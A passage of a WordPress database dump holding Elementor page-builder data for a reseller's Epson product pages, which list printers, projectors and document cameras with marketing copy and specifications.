height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><p>3.\\u00a0Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><h3>DOCUMENT CAMERAS<\\/h3><ol><li>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/li><\\/ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3922,1486,'_elementor_version','2.5.14'),(3924,2747,'_wp_page_template','template-fullwidth.php'),(3925,2747,'_elementor_edit_mode','builder'),(3926,2747,'_elementor_template_type','post'),(3927,2747,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>2.\\u00a0Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>3.\\u00a0Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4.\\u00a0Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ol><li>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/li><\\/ol><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>2.\\u00a0Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>3.\\u00a0Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ol><li>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/li><\\/ol><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9761ce4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"df42bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"022ecbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ACCENT LIGHTING LASER PROJECTORS<\\/h3><p>Epson LightScene EV-105<img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"225\\\" height=\\\"150\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6edff95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8eec823\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ae075d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e79162d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7a2bfe2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>INK TANK SYSTEM<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><h3>LASER PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><p>2.<\\/p><p>3.\\u00a0<\\/p><h3>POS PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><p>2.\\u00a03.\\u00a0<\\/p><h1>Projectors for 